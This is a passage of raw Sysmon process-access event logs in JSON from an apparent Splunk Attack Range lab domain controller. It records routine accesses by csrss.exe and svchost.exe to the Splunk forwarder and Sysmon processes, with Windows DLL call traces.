C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:41.382","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2165-5F25-0000-001081810900}","TargetProcessId":"4544","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:01:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6181,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:41.382\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:41.382","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6182,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:41.382\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:41.382","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6183,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:41.382\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:41.382","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6184,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:41.382\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:41.382","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6185,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:41.382\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:41.382","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6186,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:41.382\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:41.382","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6187,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:41.382\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:41.382","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6188,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:41.382\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 